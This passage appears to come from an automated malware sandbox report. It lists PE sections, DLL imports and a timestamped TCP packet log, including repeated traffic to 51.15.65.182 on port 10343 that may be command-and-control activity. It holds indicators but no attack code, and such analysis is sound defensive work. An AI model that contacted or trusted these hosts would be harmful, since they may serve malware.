.tls	0x28c000	0x10	0x200	bf619eac0cdf3f68d496ea9344137e8b	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x28d000	0x78	0x200	7fe9c2ef4789d0c3855af7315da04102	False	0.23046875	data	1.423525653940088	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL	Import
msvcrt.dll	__C_specific_handler, __getmainargs, __initenv, __iob_func, __set_app_type, __setusermatherr, _amsg_exit, _cexit, _commode, _fmode, _initterm, _onexit, _wcsicmp, _wcsnicmp, abort, calloc, exit, fprintf, free, fwrite, malloc, memcpy, memset, signal, strlen, strncmp, vfprintf, wcscat, wcscpy, wcslen, wcsncmp
KERNEL32.dll	DeleteCriticalSection, EnterCriticalSection, GetLastError, InitializeCriticalSection, LeaveCriticalSection, SetUnhandledExceptionFilter, Sleep, TlsGetValue, VirtualProtect, VirtualQuery

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 26, 2024 16:47:52.490684032 CEST	49675	443	192.168.2.4	173.222.162.32
Apr 26, 2024 16:48:02.099996090 CEST	49675	443	192.168.2.4	173.222.162.32
Apr 26, 2024 16:48:09.357991934 CEST	49733	443	192.168.2.4	142.250.64.196
Apr 26, 2024 16:48:09.358062029 CEST	443	49733	142.250.64.196	192.168.2.4
Apr 26, 2024 16:48:09.358097076 CEST	49734	443	192.168.2.4	142.250.64.196
Apr 26, 2024 16:48:09.358112097 CEST	443	49734	142.250.64.196	192.168.2.4
Apr 26, 2024 16:48:09.358139038 CEST	49733	443	192.168.2.4	142.250.64.196
Apr 26, 2024 16:48:09.358160973 CEST	49734	443	192.168.2.4	142.250.64.196
Apr 26, 2024 16:48:09.358211040 CEST	49735	443	192.168.2.4	142.250.64.196
Apr 26, 2024 16:48:09.358233929 CEST	443	49735	142.250.64.196	192.168.2.4
Apr 26, 2024 16:48:09.358366013 CEST	49736	443	192.168.2.4	142.250.64.196
Apr 26, 2024 16:48:09.358402014 CEST	49735	443	192.168.2.4	142.250.64.196
Apr 26, 2024 16:48:09.358445883 CEST	443	49736	142.250.64.196	192.168.2.4
Apr 26, 2024 16:48:09.358546019 CEST	49736	443	192.168.2.4	142.250.64.196
Apr 26, 2024 16:48:09.358716011 CEST	49734	443	192.168.2.4	142.250.64.196
Apr 26, 2024 16:48:09.358730078 CEST	443	49734	142.250.64.196	192.168.2.4
Apr 26, 2024 16:48:09.358995914 CEST	49733	443	192.168.2.4	142.250.64.196
Apr 26, 2024 16:48:09.359026909 CEST	443	49733	142.250.64.196	192.168.2.4
Apr 26, 2024 16:48:09.359169960 CEST	49735	443	192.168.2.4	142.250.64.196
Apr 26, 2024 16:48:09.359181881 CEST	443	49735	142.250.64.196	192.168.2.4
Apr 26, 2024 16:48:09.359538078 CEST	49736	443	192.168.2.4	142.250.64.196
Apr 26, 2024 16:48:09.359589100 CEST	443	49736	142.250.64.196	192.168.2.4
Apr 26, 2024 16:48:09.694075108 CEST	443	49735	142.250.64.196	192.168.2.4
Apr 26, 2024 16:48:09.710840940 CEST	49735	443	192.168.2.4	142.250.64.196
Apr 26, 2024 16:48:09.710855961 CEST	443	49735	142.250.64.196	192.168.2.4
Apr 26, 2024 16:48:09.712970972 CEST	443	49735	142.250.64.196	192.168.2.4
Apr 26, 2024 16:48:09.713046074 CEST	49735	443	192.168.2.4	142.250.64.196
Apr 26, 2024 16:48:09.751235008 CEST	443	49733	142.250.64.196	192.168.2.4
Apr 26, 2024 16:48:09.752388000 CEST	443	49734	142.250.64.196	192.168.2.4
Apr 26, 2024 16:48:09.753504038 CEST	443	49736	142.250.64.196	192.168.2.4
Apr 26, 2024 16:48:09.817795038 CEST	49735	443	192.168.2.4	142.250.64.196
Apr 26, 2024 16:48:09.818173885 CEST	443	49735	142.250.64.196	192.168.2.4
Apr 26, 2024 16:48:09.818280935 CEST	49736	443	192.168.2.4	142.250.64.196
Apr 26, 2024 16:48:09.818314075 CEST	443	49736	142.250.64.196	192.168.2.4
Apr 26, 2024 16:48:09.819502115 CEST	443	49736	142.250.64.196	192.168.2.4
Apr 26, 2024 16:48:09.819513083 CEST	443	49736	142.250.64.196	192.168.2.4
Apr 26, 2024 16:48:09.819551945 CEST	49736	443	192.168.2.4	142.250.64.196
Apr 26, 2024 16:48:09.892267942 CEST	49736	443	192.168.2.4	142.250.64.196
Apr 26, 2024 16:48:09.892438889 CEST	443	49736	142.250.64.196	192.168.2.4
Apr 26, 2024 16:48:09.960119963 CEST	443	49733	142.250.64.196	192.168.2.4
Apr 26, 2024 16:48:09.960474014 CEST	49733	443	192.168.2.4	142.250.64.196
Apr 26, 2024 16:48:09.964118958 CEST	443	49734	142.250.64.196	192.168.2.4
Apr 26, 2024 16:48:09.966051102 CEST	49734	443	192.168.2.4	142.250.64.196
Apr 26, 2024 16:48:09.993451118 CEST	49735	443	192.168.2.4	142.250.64.196
Apr 26, 2024 16:48:09.993453026 CEST	49736	443	192.168.2.4	142.250.64.196
Apr 26, 2024 16:48:09.993477106 CEST	443	49735	142.250.64.196	192.168.2.4
Apr 26, 2024 16:48:09.993485928 CEST	443	49736	142.250.64.196	192.168.2.4
Apr 26, 2024 16:48:10.105153084 CEST	49735	443	192.168.2.4	142.250.64.196
Apr 26, 2024 16:48:10.187109947 CEST	49736	443	192.168.2.4	142.250.64.196
Apr 26, 2024 16:48:10.989608049 CEST	49734	443	192.168.2.4	142.250.64.196
Apr 26, 2024 16:48:10.989653111 CEST	443	49734	142.250.64.196	192.168.2.4
Apr 26, 2024 16:48:10.990566969 CEST	49733	443	192.168.2.4	142.250.64.196
Apr 26, 2024 16:48:10.990629911 CEST	443	49733	142.250.64.196	192.168.2.4
Apr 26, 2024 16:48:10.990715027 CEST	443	49734	142.250.64.196	192.168.2.4
Apr 26, 2024 16:48:10.990780115 CEST	49734	443	192.168.2.4	142.250.64.196
Apr 26, 2024 16:48:10.991961956 CEST	443	49733	142.250.64.196	192.168.2.4
Apr 26, 2024 16:48:10.992024899 CEST	49733	443	192.168.2.4	142.250.64.196
Apr 26, 2024 16:48:10.995131969 CEST	49734	443	192.168.2.4	142.250.64.196
Apr 26, 2024 16:48:10.995193958 CEST	443	49734	142.250.64.196	192.168.2.4
Apr 26, 2024 16:48:10.995661974 CEST	49735	443	192.168.2.4	142.250.64.196
Apr 26, 2024 16:48:10.997356892 CEST	49733	443	192.168.2.4	142.250.64.196
Apr 26, 2024 16:48:10.997427940 CEST	443	49733	142.250.64.196	192.168.2.4
Apr 26, 2024 16:48:10.998387098 CEST	49736	443	192.168.2.4	142.250.64.196
Apr 26, 2024 16:48:10.999600887 CEST	49734	443	192.168.2.4	142.250.64.196
Apr 26, 2024 16:48:10.999608040 CEST	443	49734	142.250.64.196	192.168.2.4
Apr 26, 2024 16:48:10.999684095 CEST	49733	443	192.168.2.4	142.250.64.196
Apr 26, 2024 16:48:10.999710083 CEST	443	49733	142.250.64.196	192.168.2.4
Apr 26, 2024 16:48:11.040139914 CEST	443	49735	142.250.64.196	192.168.2.4
Apr 26, 2024 16:48:11.044126034 CEST	443	49736	142.250.64.196	192.168.2.4
Apr 26, 2024 16:48:11.080079079 CEST	49734	443	192.168.2.4	142.250.64.196
Apr 26, 2024 16:48:11.080122948 CEST	49733	443	192.168.2.4	142.250.64.196
Apr 26, 2024 16:48:11.186665058 CEST	443	49735	142.250.64.196	192.168.2.4
Apr 26, 2024 16:48:11.186945915 CEST	443	49735	142.250.64.196	192.168.2.4
Apr 26, 2024 16:48:11.186989069 CEST	49735	443	192.168.2.4	142.250.64.196
Apr 26, 2024 16:48:11.187011957 CEST	443	49735	142.250.64.196	192.168.2.4
Apr 26, 2024 16:48:11.187300920 CEST	443	49735	142.250.64.196	192.168.2.4
Apr 26, 2024 16:48:11.187345982 CEST	49735	443	192.168.2.4	142.250.64.196
Apr 26, 2024 16:48:11.187352896 CEST	443	49735	142.250.64.196	192.168.2.4
Apr 26, 2024 16:48:11.193027020 CEST	443	49735	142.250.64.196	192.168.2.4
Apr 26, 2024 16:48:11.193073988 CEST	49735	443	192.168.2.4	142.250.64.196
Apr 26, 2024 16:48:11.487490892 CEST	443	49733	142.250.64.196	192.168.2.4
Apr 26, 2024 16:48:11.487616062 CEST	443	49733	142.250.64.196	192.168.2.4
Apr 26, 2024 16:48:11.487647057 CEST	49733	443	192.168.2.4	142.250.64.196
Apr 26, 2024 16:48:11.487689972 CEST	49733	443	192.168.2.4	142.250.64.196
Apr 26, 2024 16:48:11.520658016 CEST	443	49734	142.250.64.196	192.168.2.4
Apr 26, 2024 16:48:11.520772934 CEST	443	49734	142.250.64.196	192.168.2.4
Apr 26, 2024 16:48:11.520819902 CEST	49734	443	192.168.2.4	142.250.64.196
Apr 26, 2024 16:48:11.520884991 CEST	49734	443	192.168.2.4	142.250.64.196
Apr 26, 2024 16:48:11.572654009 CEST	49736	443	192.168.2.4	142.250.64.196
Apr 26, 2024 16:48:11.572788000 CEST	443	49736	142.250.64.196	192.168.2.4
Apr 26, 2024 16:48:11.572840929 CEST	49736	443	192.168.2.4	142.250.64.196
Apr 26, 2024 16:48:11.610671997 CEST	49733	443	192.168.2.4	142.250.64.196
Apr 26, 2024 16:48:11.610739946 CEST	443	49733	142.250.64.196	192.168.2.4
Apr 26, 2024 16:48:11.611134052 CEST	49734	443	192.168.2.4	142.250.64.196
Apr 26, 2024 16:48:11.611144066 CEST	443	49734	142.250.64.196	192.168.2.4
Apr 26, 2024 16:48:11.611277103 CEST	49735	443	192.168.2.4	142.250.64.196
Apr 26, 2024 16:48:11.611294985 CEST	443	49735	142.250.64.196	192.168.2.4
Apr 26, 2024 16:48:11.616044044 CEST	49737	443	192.168.2.4	142.250.64.196
Apr 26, 2024 16:48:11.616080999 CEST	443	49737	142.250.64.196	192.168.2.4
Apr 26, 2024 16:48:11.616142988 CEST	49737	443	192.168.2.4	142.250.64.196
Apr 26, 2024 16:48:11.616539001 CEST	49738	443	192.168.2.4	142.250.64.196
Apr 26, 2024 16:48:11.616575003 CEST	443	49738	142.250.64.196	192.168.2.4
Apr 26, 2024 16:48:11.616631985 CEST	49738	443	192.168.2.4	142.250.64.196
Apr 26, 2024 16:48:11.616794109 CEST	49737	443	192.168.2.4	142.250.64.196
Apr 26, 2024 16:48:11.616810083 CEST	443	49737	142.250.64.196	192.168.2.4
Apr 26, 2024 16:48:11.617022991 CEST	49738	443	192.168.2.4	142.250.64.196
Apr 26, 2024 16:48:11.617032051 CEST	443	49738	142.250.64.196	192.168.2.4
Apr 26, 2024 16:48:11.948406935 CEST	443	49737	142.250.64.196	192.168.2.4
Apr 26, 2024 16:48:11.948658943 CEST	49737	443	192.168.2.4	142.250.64.196
Apr 26, 2024 16:48:11.948676109 CEST	443	49737	142.250.64.196	192.168.2.4
Apr 26, 2024 16:48:11.949139118 CEST	443	49737	142.250.64.196	192.168.2.4
Apr 26, 2024 16:48:11.949562073 CEST	49737	443	192.168.2.4	142.250.64.196
Apr 26, 2024 16:48:11.949652910 CEST	443	49737	142.250.64.196	192.168.2.4
Apr 26, 2024 16:48:11.949709892 CEST	49737	443	192.168.2.4	142.250.64.196
Apr 26, 2024 16:48:11.996123075 CEST	443	49737	142.250.64.196	192.168.2.4
Apr 26, 2024 16:48:12.006325960 CEST	443	49738	142.250.64.196	192.168.2.4
Apr 26, 2024 16:48:12.006596088 CEST	49738	443	192.168.2.4	142.250.64.196
Apr 26, 2024 16:48:12.006609917 CEST	443	49738	142.250.64.196	192.168.2.4
Apr 26, 2024 16:48:12.006923914 CEST	443	49738	142.250.64.196	192.168.2.4
Apr 26, 2024 16:48:12.007282019 CEST	49738	443	192.168.2.4	142.250.64.196
Apr 26, 2024 16:48:12.007334948 CEST	443	49738	142.250.64.196	192.168.2.4
Apr 26, 2024 16:48:12.007452965 CEST	49738	443	192.168.2.4	142.250.64.196
Apr 26, 2024 16:48:12.048115969 CEST	443	49738	142.250.64.196	192.168.2.4
Apr 26, 2024 16:48:12.279299021 CEST	443	49737	142.250.64.196	192.168.2.4
Apr 26, 2024 16:48:12.279341936 CEST	443	49737	142.250.64.196	192.168.2.4
Apr 26, 2024 16:48:12.279390097 CEST	443	49737	142.250.64.196	192.168.2.4
Apr 26, 2024 16:48:12.279388905 CEST	49737	443	192.168.2.4	142.250.64.196
Apr 26, 2024 16:48:12.279416084 CEST	443	49737	142.250.64.196	192.168.2.4
Apr 26, 2024 16:48:12.279459953 CEST	49737	443	192.168.2.4	142.250.64.196
Apr 26, 2024 16:48:12.279468060 CEST	443	49737	142.250.64.196	192.168.2.4
Apr 26, 2024 16:48:12.279479027 CEST	443	49737	142.250.64.196	192.168.2.4
Apr 26, 2024 16:48:12.279515982 CEST	49737	443	192.168.2.4	142.250.64.196
Apr 26, 2024 16:48:12.285994053 CEST	49737	443	192.168.2.4	142.250.64.196
Apr 26, 2024 16:48:12.286005020 CEST	443	49737	142.250.64.196	192.168.2.4
Apr 26, 2024 16:48:12.396924019 CEST	443	49738	142.250.64.196	192.168.2.4
Apr 26, 2024 16:48:12.396966934 CEST	443	49738	142.250.64.196	192.168.2.4
Apr 26, 2024 16:48:12.397011995 CEST	443	49738	142.250.64.196	192.168.2.4
Apr 26, 2024 16:48:12.397012949 CEST	49738	443	192.168.2.4	142.250.64.196
Apr 26, 2024 16:48:12.397038937 CEST	443	49738	142.250.64.196	192.168.2.4
Apr 26, 2024 16:48:12.397085905 CEST	443	49738	142.250.64.196	192.168.2.4
Apr 26, 2024 16:48:12.397088051 CEST	49738	443	192.168.2.4	142.250.64.196
Apr 26, 2024 16:48:12.397129059 CEST	49738	443	192.168.2.4	142.250.64.196
Apr 26, 2024 16:48:12.397597075 CEST	49738	443	192.168.2.4	142.250.64.196
Apr 26, 2024 16:48:12.397608042 CEST	443	49738	142.250.64.196	192.168.2.4
Apr 26, 2024 16:48:12.397619963 CEST	49738	443	192.168.2.4	142.250.64.196
Apr 26, 2024 16:48:12.397674084 CEST	49738	443	192.168.2.4	142.250.64.196
Apr 26, 2024 16:48:13.183697939 CEST	49741	443	192.168.2.4	142.250.64.196
Apr 26, 2024 16:48:13.183758020 CEST	443	49741	142.250.64.196	192.168.2.4
Apr 26, 2024 16:48:13.186842918 CEST	49741	443	192.168.2.4	142.250.64.196
Apr 26, 2024 16:48:13.187038898 CEST	49741	443	192.168.2.4	142.250.64.196
Apr 26, 2024 16:48:13.187068939 CEST	443	49741	142.250.64.196	192.168.2.4
Apr 26, 2024 16:48:14.189949036 CEST	443	49741	142.250.64.196	192.168.2.4
Apr 26, 2024 16:48:14.384968996 CEST	49741	443	192.168.2.4	142.250.64.196
Apr 26, 2024 16:48:15.155550003 CEST	49741	443	192.168.2.4	142.250.64.196
Apr 26, 2024 16:48:15.155575037 CEST	443	49741	142.250.64.196	192.168.2.4
Apr 26, 2024 16:48:15.156094074 CEST	443	49741	142.250.64.196	192.168.2.4
Apr 26, 2024 16:48:15.157289028 CEST	49741	443	192.168.2.4	142.250.64.196
Apr 26, 2024 16:48:15.157356024 CEST	443	49741	142.250.64.196	192.168.2.4
Apr 26, 2024 16:48:15.238543987 CEST	49741	443	192.168.2.4	142.250.64.196
Apr 26, 2024 16:48:16.331569910 CEST	49672	443	192.168.2.4	173.222.162.32
Apr 26, 2024 16:48:16.331614017 CEST	443	49672	173.222.162.32	192.168.2.4
Apr 26, 2024 16:48:16.422344923 CEST	49744	443	192.168.2.4	40.127.169.103
Apr 26, 2024 16:48:16.422382116 CEST	443	49744	40.127.169.103	192.168.2.4
Apr 26, 2024 16:48:16.422450066 CEST	49744	443	192.168.2.4	40.127.169.103
Apr 26, 2024 16:48:16.424793005 CEST	49744	443	192.168.2.4	40.127.169.103
Apr 26, 2024 16:48:16.424810886 CEST	443	49744	40.127.169.103	192.168.2.4
Apr 26, 2024 16:48:17.122497082 CEST	443	49744	40.127.169.103	192.168.2.4
Apr 26, 2024 16:48:17.122632980 CEST	49744	443	192.168.2.4	40.127.169.103
Apr 26, 2024 16:48:17.126462936 CEST	49744	443	192.168.2.4	40.127.169.103
Apr 26, 2024 16:48:17.126472950 CEST	443	49744	40.127.169.103	192.168.2.4
Apr 26, 2024 16:48:17.126709938 CEST	443	49744	40.127.169.103	192.168.2.4
Apr 26, 2024 16:48:17.192977905 CEST	49744	443	192.168.2.4	40.127.169.103
Apr 26, 2024 16:48:21.436841011 CEST	49744	443	192.168.2.4	40.127.169.103
Apr 26, 2024 16:48:21.484117031 CEST	443	49744	40.127.169.103	192.168.2.4
Apr 26, 2024 16:48:21.891537905 CEST	443	49744	40.127.169.103	192.168.2.4
Apr 26, 2024 16:48:21.891556978 CEST	443	49744	40.127.169.103	192.168.2.4
Apr 26, 2024 16:48:21.891566992 CEST	443	49744	40.127.169.103	192.168.2.4
Apr 26, 2024 16:48:21.891582966 CEST	443	49744	40.127.169.103	192.168.2.4
Apr 26, 2024 16:48:21.891586065 CEST	443	49744	40.127.169.103	192.168.2.4
Apr 26, 2024 16:48:21.891592979 CEST	443	49744	40.127.169.103	192.168.2.4
Apr 26, 2024 16:48:21.891638994 CEST	49744	443	192.168.2.4	40.127.169.103
Apr 26, 2024 16:48:21.891675949 CEST	443	49744	40.127.169.103	192.168.2.4
Apr 26, 2024 16:48:21.891696930 CEST	49744	443	192.168.2.4	40.127.169.103
Apr 26, 2024 16:48:21.891724110 CEST	49744	443	192.168.2.4	40.127.169.103
Apr 26, 2024 16:48:21.891935110 CEST	443	49744	40.127.169.103	192.168.2.4
Apr 26, 2024 16:48:21.891992092 CEST	49744	443	192.168.2.4	40.127.169.103
Apr 26, 2024 16:48:21.891999006 CEST	443	49744	40.127.169.103	192.168.2.4
Apr 26, 2024 16:48:21.892005920 CEST	443	49744	40.127.169.103	192.168.2.4
Apr 26, 2024 16:48:21.892050028 CEST	49744	443	192.168.2.4	40.127.169.103
Apr 26, 2024 16:48:22.193094015 CEST	49723	80	192.168.2.4	199.232.214.172
Apr 26, 2024 16:48:22.328998089 CEST	80	49723	199.232.214.172	192.168.2.4
Apr 26, 2024 16:48:22.329039097 CEST	80	49723	199.232.214.172	192.168.2.4
Apr 26, 2024 16:48:22.329099894 CEST	49723	80	192.168.2.4	199.232.214.172
Apr 26, 2024 16:48:22.403671980 CEST	49744	443	192.168.2.4	40.127.169.103
Apr 26, 2024 16:48:22.403712034 CEST	443	49744	40.127.169.103	192.168.2.4
Apr 26, 2024 16:48:22.403728008 CEST	49744	443	192.168.2.4	40.127.169.103
Apr 26, 2024 16:48:22.403736115 CEST	443	49744	40.127.169.103	192.168.2.4
Apr 26, 2024 16:48:23.564323902 CEST	443	49741	142.250.64.196	192.168.2.4
Apr 26, 2024 16:48:23.564385891 CEST	443	49741	142.250.64.196	192.168.2.4
Apr 26, 2024 16:48:23.564449072 CEST	49741	443	192.168.2.4	142.250.64.196
Apr 26, 2024 16:48:23.787854910 CEST	49741	443	192.168.2.4	142.250.64.196
Apr 26, 2024 16:48:23.787883043 CEST	443	49741	142.250.64.196	192.168.2.4
Apr 26, 2024 16:48:27.864658117 CEST	49752	10343	192.168.2.4	51.15.65.182
Apr 26, 2024 16:48:28.106591940 CEST	10343	49752	51.15.65.182	192.168.2.4
Apr 26, 2024 16:48:28.106709003 CEST	49752	10343	192.168.2.4	51.15.65.182
Apr 26, 2024 16:48:28.107147932 CEST	49752	10343	192.168.2.4	51.15.65.182
Apr 26, 2024 16:48:28.352910042 CEST	10343	49752	51.15.65.182	192.168.2.4
Apr 26, 2024 16:48:28.352937937 CEST	10343	49752	51.15.65.182	192.168.2.4
Apr 26, 2024 16:48:28.353010893 CEST	49752	10343	192.168.2.4	51.15.65.182
Apr 26, 2024 16:48:28.353813887 CEST	49752	10343	192.168.2.4	51.15.65.182
Apr 26, 2024 16:48:28.596926928 CEST	10343	49752	51.15.65.182	192.168.2.4
Apr 26, 2024 16:48:28.597204924 CEST	10343	49752	51.15.65.182	192.168.2.4
Apr 26, 2024 16:48:28.597263098 CEST	49752	10343	192.168.2.4	51.15.65.182
Apr 26, 2024 16:48:28.618175030 CEST	10343	49752	51.15.65.182	192.168.2.4
Apr 26, 2024 16:48:28.685652971 CEST	49752	10343	192.168.2.4	51.15.65.182
Apr 26, 2024 16:48:32.084573030 CEST	49753	443	192.168.2.4	145.14.144.253
Apr 26, 2024 16:48:32.084639072 CEST	443	49753	145.14.144.253	192.168.2.4
Apr 26, 2024 16:48:32.084707022 CEST	49753	443	192.168.2.4	145.14.144.253
Apr 26, 2024 16:48:32.098217964 CEST	49753	443	192.168.2.4	145.14.144.253
Apr 26, 2024 16:48:32.098246098 CEST	443	49753	145.14.144.253	192.168.2.4
Apr 26, 2024 16:48:32.140625000 CEST	10343	49752	51.15.65.182	192.168.2.4
Apr 26, 2024 16:48:32.284015894 CEST	49752	10343	192.168.2.4	51.15.65.182
Apr 26, 2024 16:48:32.406951904 CEST	443	49753	145.14.144.253	192.168.2.4
Apr 26, 2024 16:48:32.408111095 CEST	49753	443	192.168.2.4	145.14.144.253
Apr 26, 2024 16:48:32.408140898 CEST	443	49753	145.14.144.253	192.168.2.4
Apr 26, 2024 16:48:32.409710884 CEST	443	49753	145.14.144.253	192.168.2.4
Apr 26, 2024 16:48:32.409778118 CEST	49753	443	192.168.2.4	145.14.144.253
Apr 26, 2024 16:48:32.411302090 CEST	49753	443	192.168.2.4	145.14.144.253
Apr 26, 2024 16:48:32.411391973 CEST	443	49753	145.14.144.253	192.168.2.4
Apr 26, 2024 16:48:32.411446095 CEST	49753	443	192.168.2.4	145.14.144.253
Apr 26, 2024 16:48:32.411456108 CEST	443	49753	145.14.144.253	192.168.2.4
Apr 26, 2024 16:48:32.411490917 CEST	49753	443	192.168.2.4	145.14.144.253
Apr 26, 2024 16:48:32.452122927 CEST	443	49753	145.14.144.253	192.168.2.4
Apr 26, 2024 16:48:32.688256979 CEST	443	49753	145.14.144.253	192.168.2.4
Apr 26, 2024 16:48:32.688636065 CEST	443	49753	145.14.144.253	192.168.2.4
Apr 26, 2024 16:48:32.688695908 CEST	49753	443	192.168.2.4	145.14.144.253
Apr 26, 2024 16:48:32.695955992 CEST	49753	443	192.168.2.4	145.14.144.253
Apr 26, 2024 16:48:32.695990086 CEST	443	49753	145.14.144.253	192.168.2.4
Apr 26, 2024 16:48:42.213815928 CEST	10343	49752	51.15.65.182	192.168.2.4
Apr 26, 2024 16:48:42.286014080 CEST	49752	10343	192.168.2.4	51.15.65.182
Apr 26, 2024 16:48:52.327361107 CEST	10343	49752	51.15.65.182	192.168.2.4
Apr 26, 2024 16:48:52.481817961 CEST	49752	10343	192.168.2.4	51.15.65.182
Apr 26, 2024 16:48:59.234133005 CEST	49755	443	192.168.2.4	13.85.23.86
Apr 26, 2024 16:48:59.234174013 CEST	443	49755	13.85.23.86	192.168.2.4
Apr 26, 2024 16:48:59.234250069 CEST	49755	443	192.168.2.4	13.85.23.86
Apr 26, 2024 16:48:59.234667063 CEST	49755	443	192.168.2.4	13.85.23.86
Apr 26, 2024 16:48:59.234678984 CEST	443	49755	13.85.23.86	192.168.2.4
Apr 26, 2024 16:48:59.722876072 CEST	443	49755	13.85.23.86	192.168.2.4
Apr 26, 2024 16:48:59.723033905 CEST	49755	443	192.168.2.4	13.85.23.86
Apr 26, 2024 16:48:59.727869034 CEST	49755	443	192.168.2.4	13.85.23.86
Apr 26, 2024 16:48:59.727884054 CEST	443	49755	13.85.23.86	192.168.2.4
Apr 26, 2024 16:48:59.728138924 CEST	443	49755	13.85.23.86	192.168.2.4
Apr 26, 2024 16:48:59.737663984 CEST	49755	443	192.168.2.4	13.85.23.86
Apr 26, 2024 16:48:59.784121037 CEST	443	49755	13.85.23.86	192.168.2.4
Apr 26, 2024 16:49:00.195792913 CEST	443	49755	13.85.23.86	192.168.2.4
Apr 26, 2024 16:49:00.195821047 CEST	443	49755	13.85.23.86	192.168.2.4
Apr 26, 2024 16:49:00.195893049 CEST	443	49755	13.85.23.86	192.168.2.4
Apr 26, 2024 16:49:00.195980072 CEST	49755	443	192.168.2.4	13.85.23.86
Apr 26, 2024 16:49:00.196003914 CEST	443	49755	13.85.23.86	192.168.2.4
Apr 26, 2024 16:49:00.196036100 CEST	49755	443	192.168.2.4	13.85.23.86
Apr 26, 2024 16:49:00.196074009 CEST	49755	443	192.168.2.4	13.85.23.86
Apr 26, 2024 16:49:00.196243048 CEST	443	49755	13.85.23.86	192.168.2.4
Apr 26, 2024 16:49:00.196288109 CEST	443	49755	13.85.23.86	192.168.2.4
Apr 26, 2024 16:49:00.196316957 CEST	49755	443	192.168.2.4	13.85.23.86
Apr 26, 2024 16:49:00.196327925 CEST	443	49755	13.85.23.86	192.168.2.4
Apr 26, 2024 16:49:00.196357012 CEST	443	49755	13.85.23.86	192.168.2.4
Apr 26, 2024 16:49:00.196377993 CEST	49755	443	192.168.2.4	13.85.23.86
Apr 26, 2024 16:49:00.196407080 CEST	49755	443	192.168.2.4	13.85.23.86
Apr 26, 2024 16:49:00.278582096 CEST	49755	443	192.168.2.4	13.85.23.86
Apr 26, 2024 16:49:00.278642893 CEST	443	49755	13.85.23.86	192.168.2.4
Apr 26, 2024 16:49:00.278728008 CEST	49755	443	192.168.2.4	13.85.23.86
Apr 26, 2024 16:49:00.278745890 CEST	443	49755	13.85.23.86	192.168.2.4
Apr 26, 2024 16:49:02.280628920 CEST	10343	49752	51.15.65.182	192.168.2.4
Apr 26, 2024 16:49:02.476924896 CEST	49752	10343	192.168.2.4	51.15.65.182
Apr 26, 2024 16:49:10.484718084 CEST	49724	80	192.168.2.4	199.232.214.172
Apr 26, 2024 16:49:10.616179943 CEST	80	49724	199.232.214.172	192.168.2.4
Apr 26, 2024 16:49:10.616250038 CEST	80	49724	199.232.214.172	192.168.2.4
Apr 26, 2024 16:49:10.616331100 CEST	49724	80	192.168.2.4	199.232.214.172
Apr 26, 2024 16:49:11.356465101 CEST	10343	49752	51.15.65.182	192.168.2.4
Apr 26, 2024 16:49:11.473737001 CEST	49752	10343	192.168.2.4	51.15.65.182
Apr 26, 2024 16:49:13.267535925 CEST	49760	443	192.168.2.4	142.250.64.196
Apr 26, 2024 16:49:13.267608881 CEST	443	49760	142.250.64.196	192.168.2.4
Apr 26, 2024 16:49:13.267729044 CEST	49760	443	192.168.2.4	142.250.64.196
Apr 26, 2024 16:49:13.267934084 CEST	49760	443	192.168.2.4	142.250.64.196
Apr 26, 2024 16:49:13.267975092 CEST	443	49760	142.250.64.196	192.168.2.4
Apr 26, 2024 16:49:13.593971014 CEST	443	49760	142.250.64.196	192.168.2.4
Apr 26, 2024 16:49:13.594304085 CEST	49760	443	192.168.2.4	142.250.64.196
Apr 26, 2024 16:49:13.594342947 CEST	443	49760	142.250.64.196	192.168.2.4
Apr 26, 2024 16:49:13.595453024 CEST	443	49760	142.250.64.196	192.168.2.4
Apr 26, 2024 16:49:13.595523119 CEST	49760	443	192.168.2.4	142.250.64.196
Apr 26, 2024 16:49:13.599821091 CEST	49760	443	192.168.2.4	142.250.64.196
Apr 26, 2024 16:49:13.599915981 CEST	443	49760	142.250.64.196	192.168.2.4
Apr 26, 2024 16:49:13.774291992 CEST	49760	443	192.168.2.4	142.250.64.196
Apr 26, 2024 16:49:13.774331093 CEST	443	49760	142.250.64.196	192.168.2.4
Apr 26, 2024 16:49:13.882658958 CEST	49760	443	192.168.2.4	142.250.64.196
Apr 26, 2024 16:49:18.272608042 CEST	49760	443	192.168.2.4	142.250.64.196
Apr 26, 2024 16:49:18.272804976 CEST	443	49760	142.250.64.196	192.168.2.4
Apr 26, 2024 16:49:18.272897959 CEST	49760	443	192.168.2.4	142.250.64.196
Apr 26, 2024 16:49:21.220750093 CEST	10343	49752	51.15.65.182	192.168.2.4
Apr 26, 2024 16:49:21.286577940 CEST	49752	10343	192.168.2.4	51.15.65.182
Apr 26, 2024 16:49:28.476296902 CEST	49764	443	192.168.2.4	145.14.144.253
Apr 26, 2024 16:49:28.476391077 CEST	443	49764	145.14.144.253	192.168.2.4
Apr 26, 2024 16:49:28.476485014 CEST	49764	443	192.168.2.4	145.14.144.253
Apr 26, 2024 16:49:28.512381077 CEST	49764	443	192.168.2.4	145.14.144.253
Apr 26, 2024 16:49:28.512443066 CEST	443	49764	145.14.144.253	192.168.2.4
Apr 26, 2024 16:49:28.808351994 CEST	443	49764	145.14.144.253	192.168.2.4
Apr 26, 2024 16:49:28.809648037 CEST	49764	443	192.168.2.4	145.14.144.253
Apr 26, 2024 16:49:28.809684992 CEST	443	49764	145.14.144.253	192.168.2.4
Apr 26, 2024 16:49:28.810756922 CEST	443	49764	145.14.144.253	192.168.2.4
Apr 26, 2024 16:49:28.810862064 CEST	49764	443	192.168.2.4	145.14.144.253
Apr 26, 2024 16:49:28.812755108 CEST	49764	443	192.168.2.4	145.14.144.253
Apr 26, 2024 16:49:28.812834978 CEST	443	49764	145.14.144.253	192.168.2.4
Apr 26, 2024 16:49:28.812895060 CEST	49764	443	192.168.2.4	145.14.144.253
Apr 26, 2024 16:49:28.812906027 CEST	443	49764	145.14.144.253	192.168.2.4
Apr 26, 2024 16:49:28.812989950 CEST	49764	443	192.168.2.4	145.14.144.253
Apr 26, 2024 16:49:28.856122971 CEST	443	49764	145.14.144.253	192.168.2.4
Apr 26, 2024 16:49:29.106182098 CEST	443	49764	145.14.144.253	192.168.2.4
Apr 26, 2024 16:49:29.106564999 CEST	443	49764	145.14.144.253	192.168.2.4
Apr 26, 2024 16:49:29.106642962 CEST	49764	443	192.168.2.4	145.14.144.253
Apr 26, 2024 16:49:29.115417957 CEST	49764	443	192.168.2.4	145.14.144.253
